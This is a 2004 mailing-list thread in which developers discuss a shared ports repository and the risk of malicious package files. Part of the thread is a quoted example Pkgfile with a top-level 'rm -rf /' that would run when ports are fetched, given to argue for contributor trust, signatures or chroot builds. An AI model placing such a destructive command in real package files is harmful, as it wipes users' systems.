Re: [clc-devel] httpup repositories and unmaintained (next try) [long]
Hi, Since discussion seems to be dying out and the solution Johannes suggested could apparently only improve the current situation of rotting unmaintained ports and decentralized repositories, I propose we start implementing the 'people' collection if no one has anything major against it. My Perl and PHP skills are at your disposal if I can be of any help. Regards, // Jukka Heino
Hey, On Tue, Aug 24, 2004 at 12:50:52 +0300, Jukka Heino wrote:
Hi,
Since discussion seems to be dying out and the solution Johannes suggested could apparently only improve the current situation of rotting unmaintained ports and decentralized repositories, I propose we start implementing the 'people' collection if no one has anything major against it. Actually, I asked Per about his opinion and he mentioned that there's a servere security risk: if someone puts something malicious into a Pkgfile like the following:
--- quote --- name=xyz version=1000 release=1 rm -rf / build() { ... } --- /quote -- A simple 'ports -d' would be sufficient to make you appreciate your backups. Obviously, this can be done in a private repository as well, but with a central big collection with somewhat implied trust (since it's controlled by CLC after all), we'd simplify such an attack a lot. There are a few solutions which come to mind, but all terminate the goal of "no access restrictions": - only accept repos from known persons - require a GnuPG signatures conforming to a yet-to-be-defined level of trust So I guess we have to reconsider the situation, and maybe try to arrange a get together to discuss this and further issues. Kind regards, Johannes -- Johannes Winkelmann mailto:jw@tks6.net Bern, Switzerland http://jw.tks6.net
Johannes Winkelmann wrote:
Hey,
On Tue, Aug 24, 2004 at 12:50:52 +0300, Jukka Heino wrote:
Hi,
Since discussion seems to be dying out and the solution Johannes suggested could apparently only improve the current situation of rotting unmaintained ports and decentralized repositories, I propose we start implementing the 'people' collection if no one has anything major against it.
Actually, I asked Per about his opinion and he mentioned that there's a servere security risk: if someone puts something malicious into a Pkgfile like the following:
--- quote --- name=xyz version=1000 release=1 rm -rf /
build() { ... } --- /quote --
A simple 'ports -d' would be sufficient to make you appreciate your backups. Obviously, this can be done in a private repository as well, but with a central big collection with somewhat implied trust (since it's controlled by CLC after all), we'd simplify such an attack a lot.
There are a few solutions which come to mind, but all terminate the goal of "no access restrictions": - only accept repos from known persons - require a GnuPG signatures conforming to a yet-to-be-defined level of trust
I do not think this is a Repository issue but a package system issue. Perhaps what we should revisit is chroot approaches to building packages or maybe using fakeroot to at least limit the damage. After all, sooner or later, someone, by error or otherwise, will do something like this. however protecting people from themselves introduces complexity that most don't want, so... Unfortunately, mount -r --bind /lib lib didn't seem to work, well, just an idea. Victor
participants (3)
-
Johannes Winkelmann -
Jukka Heino -
Victor